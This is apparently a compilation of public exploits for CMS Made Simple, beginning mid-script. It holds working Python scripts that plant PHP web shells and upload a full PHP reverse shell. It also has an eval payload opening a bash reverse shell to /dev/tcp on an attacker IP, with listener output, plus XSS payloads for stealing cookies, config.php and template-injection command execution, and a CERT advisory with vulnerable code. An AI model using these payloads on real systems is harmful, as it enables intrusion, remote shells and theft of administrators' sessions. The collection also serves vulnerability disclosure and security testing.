aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZXMsIiIpOyBicmVhazsNCiAgICAgICAgICBjYXNlICJyZW1vdmUiIDogJHRoaXMtPlJlbW92ZVByZWZlcmVuY2UoJHZhbHVlcyk7IGJyZWFrOw0KICAgICAgICAgIGRlZmF1bHQgOg0KICAgICAgICB9DQoNCiAgICAgIH0NCiAgICAgIHJldHVybjsNCiAgICB9DQogICAgZm9yZWFjaCgkdmFsdWVzIGFzICR2YWx1ZSkgew0KICAgICAgLy9lY2hvICJoaSIuJHBhcmFtc1skdmFsdWVdOyBkaWUoKTsNCiAgICAgIGlmIChpc3NldCgkcGFyYW1zWyR2YWx1ZV0pKSB7DQogICAgICAgICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZSwkcGFyYW1zWyR2YWx1ZV0pOw0KICAgICAgfSBlbHNlIHsNCg0KICAgICAgICBzd2l0Y2ggKCRoYW5kbGV1bnNldCkgew0KICAgICAgICAgIGNhc2UgImNsZWFyIiA6ICR0aGlzLT5TZXRQcmVmZXJlbmNlKCR2YWx1ZSwiIik7IGJyZWFrOw0KICAgICAgICAgIGNhc2UgInJlbW92ZSIgOiAkdGhpcy0+UmVtb3ZlUHJlZmVyZW5jZSgkdmFsdWUpOyBicmVhazsNCiAgICAgICAgICBkZWZhdWx0IDoNCiAgICAgICAgfQ0KICAgICAgfQ0KICAgIH0NCiAgfQ0KDQogIGZ1bmN0aW9uIHByZigkcHJlZmVyZW5jZW5hbWUsICRkZWZhdWx0dmFsdWU9IiIpIHsNCiAgICByZXR1cm4gJHRoaXMtPkdldFByZWZlcmVuY2UoJHByZWZlcmVuY2VuYW1lLCRkZWZhdWx0dmFsdWUpOw0KICB9DQp9]]></data>\n </file>\n <file>\n <filename>/moduleinfo.ini</filename>\n <isdir>0</isdir>\n <data><![CDATA[W21vZHVsZV0KbmFtZSA9ICJNYXRvbW8iCnZlcnNpb24gPSAiMC4wLjEiCmF1dGhvciA9ICJleWVkZWUtbWVkaWEiCmF1dGhvcmVtYWlsID0gIm1vcnRlbkBwb3Vsc2VuLm9yZyIKbWluY21zdmVyc2lvbiA9ICIyLjEuNSIKbGF6eWxvYWRhZG1pbiA9IDAKbGF6eWxvYWRmcm9udGVuZCA9IDAK]]></data>\n </file>\n <file>\n <filename>/templates/</filename>\n <isdir>1</isdir>\n </file>\n <file>\n <filename>/templates/adminsettings.tpl</filename>\n <isdir>0</isdir>\n <data><![CDATA[e2Zvcm1fc3RhcnQgYWN0aW9uPSJzYXZlc2V0dGluZ3MifQ0KPGRpdiBjbGFzcz0icGFnZW92ZXJmbG93Ij4NCiAgICA8cCBjbGFzcz0icGFnZXRleHQiPg0KICAgICAgICA8bGFiZWwgZm9yPSJ7JGFpZH1mbGQxIj57JG1vZC0+bGFuZygiYmFzZXVybCIpfTo8L2xhYmVsPiB7KmNtc19oZWxwIGtleT0naGVscF9hcnRpY2xlX3VzZWV4cGlyeScgdGl0bGU9JHVzZWV4cGlyYXRpb250ZXh0Kn0NCiAgICA8L3A+DQogICAgPHAgY2xhc3M9InBhZ2VpbnB1dCI+DQogICAgICAgIDxpbnB1dCBpZD0ieyRhaWR9ZmxkMSIgdHlwZT0idGV4dCIgc2l6ZT0iNjQiIGxlbmd0aD0iNjQiIHZhbHVlPSJ7JG1vZC0+cHJmKCJiYXNldXJsIil9IiBuYW1lPSJ7JGFpZH1iYXNldXJsIj57JG1vZC0+bGFuZygiYmFzZXVybGhlbHAiKX0NCiAgICA8L3A+DQo8L2Rpdj4NCg0KPGRpdiBjbGFzcz0icGFnZW92ZXJmbG93Ij4NCiAgICA8cCBjbGFzcz0icGFnZXRleHQiPg0KICAgICAgICA8bGFiZWwgZm9yPSJ7JGFpZH1mbGQzIj57JG1vZC0+bGFuZygiYXBpdG9rZW4iKX06PC9sYWJlbD4geypjbXNfaGVscCBrZXk9J2hlbHBfYXJ0aWNsZV91c2VleHBpcnknIHRpdGxlPSR1c2VleHBpcmF0aW9udGV4dCp9DQogICAgPC9wPg0KICAgIDxwIGNsYXNzPSJwYWdlaW5wdXQiPg0KICAgICAgICA8aW5wdXQgaWQ9InskYWlkfWZsZDMiIHR5cGU9InRleHQiIHNpemU9IjY0IiBsZW5ndGg9IjY0IiB2YWx1ZT0ieyRtb2QtPnByZigiYXBpdG9rZW4iKX0iIG5hbWU9InskYWlkfWFwaXRva2VuIj57JG1vZC0+bGFuZygiYXBpdG9rZW5oZWxwIil9DQogICAgPC9wPg0KPC9kaXY+DQoNCjxkaXYgY2xhc3M9InBhZ2VvdmVyZmxvdyI+DQogICAgPHAgY2xhc3M9InBhZ2V0ZXh0Ij4NCiAgICAgICAgPGxhYmVsIGZvcj0ieyRhaWR9ZmxkNCI+eyRtb2QtPmxhbmcoInNpdGVpZCIpfTo8L2xhYmVsPiB7KmNtc19oZWxwIGtleT0naGVscF9hcnRpY2xlX3VzZWV4cGlyeScgdGl0bGU9JHVzZWV4cGlyYXRpb250ZXh0Kn0NCiAgICA8L3A+DQogICAgPHAgY2xhc3M9InBhZ2VpbnB1dCI+DQogICAgICAgIDxpbnB1dCBpZD0ieyRhaWR9ZmxkNCIgdHlwZT0idGV4dCIgc2l6ZT0iOCIgbGVuZ3RoPSI4IiB2YWx1ZT0ieyRtb2QtPnByZigic2l0ZWlkIil9IiBuYW1lPSJ7JGFpZH1zaXRlaWQiPnskbW9kLT5sYW5nKCJzaXRlaWRoZWxwIil9DQogICAgPC9wPg0KPC9kaXY+DQoNCjxkaXYgY2xhc3M9InBhZ2VvdmVyZmxvdyI+DQogICAgPHAgY2xhc3M9InBhZ2V0ZXh0Ij4NCiAgICAgICAgPGxhYmVsIGZvcj0ieyRhaWR9ZmxkMiI+eyRtb2QtPmxhbmcoInRyYWNraW5nY29kZSIpfTo8L2xhYmVsPiB7KmNtc19oZWxwIGtleT0naGVscF9hcnRpY2xlX3VzZWV4cGlyeScgdGl0bGU9JHVzZWV4cGlyYXRpb250ZXh0Kn0NCiAgICA8L3A+DQogICAgPHAgY2xhc3M9InBhZ2VpbnB1dCI+DQogICAgICAgIDx0ZXh0YXJlYSBpZD0ieyRhaWR9ZmxkMiIgcm93cz0iMTIiIGNvbHM9IjQwIiBuYW1lPSJ7JGFpZH10cmFja2luZ2NvZGUiPnskbW9kLT5wcmYoInRyYWNraW5nY29kZSIpfTwvdGV4dGFyZWE+DQogICAgICAgIDxici8+DQogICAgICAgIHskbW9kLT5sYW5nKCJ0cmFja2luZ2NvZGVoZWxwIil9DQogICAgPC9wPg0KPC9kaXY+DQoNCjxkaXYgY2xhc3M9InBhZ2VvdmVyZmxvdyI+DQogICAgPHAgY2xhc3M9InBhZ2V0ZXh0Ij4NCg0KICAgIDwvcD4NCiAgICA8cCBjbGFzcz0icGFnZWlucHV0Ij4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ieyRhaWR9c3VibWl0IiB2YWx1ZT0ieyRtb2QtPmxhbmcoInNhdmVzZXR0aW5ncyIpfSIvPg0KICAgIDwvcD4NCjwvZGl2Pg0KDQoNCntmb3JtX2VuZH0NCg==]]></data>\n </file>\n</module>\r\n-----------------------------207726338310671742711263591267--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al"
# Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
# Date: 3rd of July, 2018
# Exploit Author: Mustafa Hasan (@strukt93)
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.5
# CVE: CVE-2018-1000094
import requests
import base64
base_url = "http://192.168.1.10/cmsms/admin"
upload_dir = "/uploads"
upload_url = base_url.split('/admin')[0] + upload_dir
username = "admin"
password = "password"
csrf_param = "__c"
txt_filename = 'cmsmsrce.txt'
php_filename = 'shell.php'
payload = "<?php system($_GET['cmd']);?>"
def parse_csrf_token(location):
return location.split(csrf_param + "=")[1]
def authenticate():
page = "/login.php"
url = base_url + page
data = {
"username": username,
"password": password,
"loginsubmit": "Submit"
}
response = requests.post(url, data=data, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
print "[+] Authenticated successfully with the supplied credentials"
return response.cookies, parse_csrf_token(response.headers['Location'])
print "[-] Authentication failed"
return None, None
def upload_txt(cookies, csrf_token):
mact = "FileManager,m1_,upload,0"
page = "/moduleinterface.php"
url = base_url + page
data = {
"mact": mact,
csrf_param: csrf_token,
"disable_buffer": 1
}
txt = {
'm1_files[]': (txt_filename, payload)
}
print "[*] Attempting to upload {}...".format(txt_filename)
response = requests.post(url, data=data, files=txt, cookies=cookies)
status_code = response.status_code
if status_code == 200:
print "[+] Successfully uploaded {}".format(txt_filename)
return True
print "[-] An error occurred while uploading {}".format(txt_filename)
return None
def copy_to_php(cookies, csrf_token):
mact = "FileManager,m1_,fileaction,0"
page = "/moduleinterface.php"
url = base_url + page
b64 = base64.b64encode(txt_filename)
serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
data = {
"mact": mact,
csrf_param: csrf_token,
"m1_fileactioncopy": "",
"m1_path": upload_dir,
"m1_selall": serialized,
"m1_destdir": "/",
"m1_destname": php_filename,
"m1_submit": "Copy"
}
print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
status_code = response.status_code
if status_code == 302:
if response.headers['Location'].endswith('copysuccess'):
print "[+] File copied successfully"
return True
print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
return None
def quit():
print "[-] Exploit failed"
exit()
def run():
cookies,csrf_token = authenticate()
if not cookies:
quit()
if not upload_txt(cookies, csrf_token):
quit()
if not copy_to_php(cookies, csrf_token):
quit()
print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
run()
# Exploit Title: CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated)
# Date: 04/12/2020
# Exploit Author: Eshan Singh
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads
# Version: cmsms v2.2.15
# Tested on: Windows/Kali Linux/Ubuntu
Description
----------------------
CMS Made Simple 2.2.15 allows an authenticated user with access to the
Content Manager to edit content and put persistent XSS payload using the
malicious SVG file. The user can get cookies from every authenticated user
who visits the website.
SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg
Steps to reproduce
-------------------
1. Login into the cmsms admin panel using the admin user.
2. then go to content > file manager > images, now upload the malicious svg
(
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg)
file.
3. now open the svg file location (
http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the
popup.
Burp Request
-------------
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------379224531139948695983200896304
Content-Length: 1040
Origin: http://127.0.0.1
Connection: close
Cookie:
a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D;
__c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="mact"
FileManager,m1_,upload,0
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="__c"
3d8ee0fbb464e874e82
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="disable_buffer"
1
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="m1_files[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------379224531139948695983200896304--
# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)
# Author: Andrey Stoykov
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms
# Version: 2.2.15
# Tested on: Debian 10 LAMPP
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html
Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function.
// Vulnerable eval() code
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {
Reproduction Steps:
1. Login as administrator user and navigate to Extensions->User Defined Tags
2. Add code with the payload of:
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'");
3. Click on the newly created User Defined Tag and use the Run function
RCE will be achieved:
astoykov@Lubuntu:~$ nc -kvlp 4444
nc: getnameinfo: Temporary failure in name resolution
Connection received on 192.168.56.132 53690
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
# Exploit Title: CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS)
# Date: 2021/03/19
# Exploit Author: bt0
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14832/cmsms-2.2.15-install.zip
# Version: 2.2.15
# CVE: CVE-2021-28935 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28935
-----------------------------------------------------------
If you log into Admin panel and open My Preferences you could be able to exploit XSS in title field
Reflected XSS in /admin/addbookmark.php
Some payloads that works:
"><script>prompt(1)</script><"
"><script>alert(1)</script><"
63311';alert(1)//812
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
------------------------------------------------------------
# Exploit Title: CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)
# Google Dork: -
# Date: 2020-09-29
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04
# CVE: CVE-2020-24860
1. Description:
----------------------
CMS Made Simple 2.2.14 allows an authenticated user with access to the Content Manager to edit content and put persistent XSS payload in the affected text fields. The user
can get cookies from every authenticated user who visits the website.
2. Affected parameters:
----------------------
Content > Content Manager > Edit some page > Logic (tab) > Page Specific Metadata (text field)
Content > Content Manager > Edit some page > Logic (tab) > Smart data or logic that is specific to this page (text field)
3: Example payload:
----------------------
<script>alert(document.cookie);</script>
4: Exploitation demo:
----------------------
youtube.com/watch?v=M6D7DmmjLak&t=22s
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2020-07-29
# Exploit Author: Roel van Beurden
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04
# CVE: N/A
1. Description:
----------------------
CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution.
2. Proof of Concept:
----------------------
- Create .phtml or .ptar file with malicious PHP payload;
- Upload .phtml or .ptar file in the 'File Manager' module;
- Click on the uploaded file to perform remote code execution.
3: Example payload:
----------------------
<?php system($_GET['cmd']);?>
4a: Burp request:
----------------------
GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1
Host: 10.10.10.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v
Upgrade-Insecure-Requests: 1
4b: Burp response:
----------------------
HTTP/1.1 200 OK
Date: Thu, 30 Jul 2020 23:14:47 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 54
Connection: close
Content-Type: text/html; charset=UTF-8
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#!/usr/bin/python3
#-*- coding: utf-8 -*-
# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-08-31
# Exploit Author: Luis Noriega (@nogagmx)
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
# Version: 2.2.14
# Tested on: Linux Ubuntu 18.04.4 LTS
# CVE : N/A
# Usage:
# python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT
from urllib.parse import urlparse
import requests
import argparse
import string
import random
import json
import sys
def parse_url(URL):
t = urlparse(URL)
return t.scheme+'://'+t.netloc+t.path.split('login.php')[0] + 'moduleinterface.php'
parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell')
parser.add_argument('--url', dest='URL', help='URL to admin pane </admin/login.php>', required=True)
parser.add_argument('-u', dest='USERNAME', help='Username', required=True)
parser.add_argument('-p', dest='PASSWORD', help='Password', required=True)
parser.add_argument('-lhost', dest='IP', help='The listen address', required=True)
parser.add_argument('-lport', dest='PORT', help='The listen port', required=True)
args = parser.parse_args()
login_data = {'username':"", "password":"", "loginsubmit": "Submit"}
PAYLOAD = '<?php set_time_limit (0); $VERSION = "1.0"; $ip = "%s"; $port = "%s"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>'% (args.IP,args.PORT)
FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar'
file = {'m1_files[]': (FILENAME, PAYLOAD)}
upload_data = {"mact":"FileManager,m1_,upload,0", "__c":"", "disable_buffer":"1"}
URL_UPLOAD = parse_url(args.URL)
print("[ + ] Connection to the CMS Made Simple Admin Portal located at "+ args.URL)
print("[ + ] Using "+ args.USERNAME +":"+ args.PASSWORD); login_data['username'] = args.USERNAME; login_data['password'] = args.PASSWORD
try:
session = requests.session()
req = session.post(args.URL, data=login_data)
upload_data["__c"] = session.cookies["__c"]
print ("[ + ] %s logged successfully!"%(args.USERNAME))
response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies,data=upload_data)
data = response.json()
print ("[ + ] %s file uploaded."%(FILENAME))
URL_TRIGGER = data[0]['url']
input("[ ! ] Set up your nc listener <nc -nvlp %s>, then press any to exploit.."%(args.PORT))
print ("[ + ] Pwned!!")
response = requests.get(URL_TRIGGER, cookies=session.cookies)
print ("[ + ] Bye")
except:
print ("[ x ] Something went wrong, try again.")
sys.exit(1)
# Exploit Title: CMS Made Simple 2.1.6 - Remote Code Execution
# Date: 2018-02-26
# Exploit Author: Keerati T.
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: http://s3.amazonaws.com/cmsms/downloads/13570/cmsms-2.
1.6-install.zip
# Version: 2.1.6
# CVE: CVE-2018-7448
# Tested on: Linux
1.Description
Arbitrary PHP code can be injected into configuration file (config.php) after installation has been finished. In order to inject PHP code, fresh install and valid database credentials is required. Application will force an installer (usually "www-data" due to web-based installation) to set a write permission (777) to destination directory and related installation file. An attacker will proceed installation process until reach step 4 and inject malicious PHP code into "timezone" parameter. Once PHP code has been injected to "config.php", an attacker will be able to execute OS command by accessing backdoor "config.php" file along with injected parameter which contain OS command value.
2.Proof of Concept
- Access to "http://target/path/cmsms-2.1.6-install.php" for installing CMS Made Simple
- Proceed to step 4 of installation which is database setup stage, enter a valid database credentials and modifying "timezone" parameter on intercepted proxy as following:
==========
POST /cms/cmsms-2.1.6-install.php/index.php?mdf68c24c=4 HTTP/1.1
Host: 192.168.5.196
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.196/cms/cmsms-2.1.6-install.php/index.
php?mdf68c24c=4
Cookie: CMSICc861538bbb=i549m59qpme0u9klupbkb68me4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
dbhost=localhost&dbname=cms&dbuser=xvwa&dbpass=xvwa&
timezone=junk';echo%20system($_GET['cmd']);$junk='junk&next=Next+%E2%86%92
==========
- Forward tampered "timezone" parameter packet and proceed to next step until successfully installation.
- Execute OS command via "config.php" by requesting " http://target/path/config.php?cmd=id;uname"
3.Timeline
2017-04-14 Vulnerability report
2017-04-15 Vendor inform that will be fixed on next full release
2017-06-10 Version 2.2 release and vulnerability fixed
2018-02-23 CVE assigned
2018-02-26 Public
# Title: CMSMS 2.1.6 Multiple Vulnerabilities
# Date: 10-05-2017
# Tested on: Windows 8 64-bit
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up: https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/
# CVE: CVE-2017-8912
Remote Code Execution
======================
POST /cmsms/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1
Stored XSS
==========
POST /cmsms/admin/addgroup.php HTTP/1.1
_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true
Disclosure Timeline
====================
09-05-2017: Reported to the vendor
09-05-2017: Vendor doesn't accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug :)
10-05-2017: Public disclosure
11-05-2017: Assigned CVE-2017-8912
# Exploit Title: CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection
# Google Dork: N/A
# Date: 11/10/2017
# Exploit Author: Gurkirat Singh <tbhaxor@gmail.com>
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: N/A
# Version: 2.1.6
# Tested on: Linux
# CVE : CVE-2017-16783
# POC : https://www.netsparker.com/blog/web-security/exploiting-ssti-and-xss-in-cms-made-simple/
PFA
-------
Gurkirat Singh
(tbhaxor <https://google.com/search?q=tbhaxor>)
from argparse import ArgumentParser, RawTextHelpFormatter
from urllib.parse import urlparse, parse_qs, urlencode, quote, unquote_plus
import requests as http
import re
from bs4 import BeautifulSoup, Tag
from huepy import *
parser = ArgumentParser(description="Exploit for CVE-2017-16783",
formatter_class=RawTextHelpFormatter)
parser.add_argument(
"--target",
"-t",
help="complete remote target with protocol, host, path and query",
required=True,
dest="t")
parser.add_argument("--command",
"-c",
help="command to execute (default: whoami)",
default="whoami",
dest="c")
args = parser.parse_args()
print(info("Building malicious url"))
url = urlparse(args.t)
query = parse_qs(url.query)
query["cntnt01detailtemplate"] = [
"string:{php}echo `echo tbhaxor;%s;echo tbhaxor`;{/php}" % args.c
]
query = {k: ",".join(v) for k, v in query.items()}
query = unquote_plus(urlencode(query, doseq=False))
_url = url.scheme + "://" + url.netloc + url.path + "?" + query
print(good("Done"))
print(info("Executing payload"))
r = http.get(_url)
html = BeautifulSoup(r.content.decode(), "html5lib")
main: Tag = html.find("article", {"id": "main"})
main = re.sub(r"^Home", "", main.text.strip()).replace("tbhaxor", "").strip()
print(good("Done"))
print(info("Result"))
print(main)
> Vulnerabilities in CMS Made Simple, version 1.11.9
> Discovered by Pedro Ribeiro (pedrib@gmail.com) of Agile Information Security
> Reported to ted@cmsmadesimple.org and calguy1000@cmsmadesimple.org
Disclosure: 28/02/2014 / Last updated: 12/10/2014
CMS Made Simple, an open source content management system, allows for faster and easier management of website content. This CMS is scalable for small businesses to large corporations.
TL;DR:
XSS in admin console, weak CSRF protection and a possible PHP object insertion via unserialize.
These vulnerabilities were considered unimportant by the CMS Made Simple developers. Their reasoning was that they had to be exploited by a logged in administrator user who is a trusted user anyway. When I explained to them that with XSS all you need to do is send a malicious link to the administrator, they responded back saying that they are confident in their CSRF protection. I then sent them an analysis of their CSRF protection (at the bottom of this advisory), which I found to be quite weak. Finally they commited to implement a half-assed mitigation for the CSRF token weakness but said they will not fix the other issues.
Timeline:
- 27.11.2013: Initial contact to the emails listed in www.cmsmadesimple.com. No reply.
- 03.12.2013: Message posted in the www.cmsmadesimple.com public forum asking to contact me back. A few hours later I was contacted by calguy and sent him a more complete version of this advisory with recommendations.
- 09.12.2013: calguy responds saying these will not be fixed as you have to be an admin user anyway.
- 13.12.2013: After a few days arguing over email, Robert Campbell, CMS Made Simple project manager, responds with an official note saying they will double the CSRF token length in a future release but will not fix the rest of the issues.
- 14.12.2013: Handed over to CERT asking for help to try to reason with the CMS Made Simple developers.
- 28.02.2014: Public disclosure by CERT
====================================================================
Vulnerability: Persistent cross site scripting (XSS) in add* pages (CVE-2014-0334)
File(line): cmsmadesimple/admin/addgroup.php(107)
File(line): cmsmadesimple/admin/addhtmlblob.php(165)
File(line): cmsmadesimple/admin/addbookmark.php(92/96)
Code snippet:
addgroup.php:
$group= "";
if (isset($_POST["group"])) $group = $_POST["group"];
...
<div class="pageoverflow">
<p class="pagetext">*<?php echo lang('name')?>:</p>
<p class="pageinput"><input type="text" name="group" maxlength="255" value="<?php echo $group?>" /></p>
addhtmlblob.php:
$htmlblob = "";
if (isset($_POST['htmlblob'])) $htmlblob = trim($_POST['htmlblob']);
...
<div class="pageoverflow">
<p class="pagetext">*<?php echo lang('name') .' '. lang('gcb_name_help')?>:</p>
<p class="pageinput"><input type="text" name="htmlblob" maxlength="255" value="<?php echo $htmlblob?>" class="standard" /></p>
</div>
addbookmark.php:
$title= "";
if (isset($_POST["title"])) $title = $_POST["title"];
$url = "";
if (isset($_POST["url"])) $url = $_POST["url"];
...
<input type="hidden" name="<?php echo CMS_SECURE_PARAM_NAME ?>" value="<?php echo $_SESSION[CMS_USER_KEY] ?>" />
</div>
<div class="pageoverflow">
<p class="pagetext"><?php echo lang('title')?>:</p>
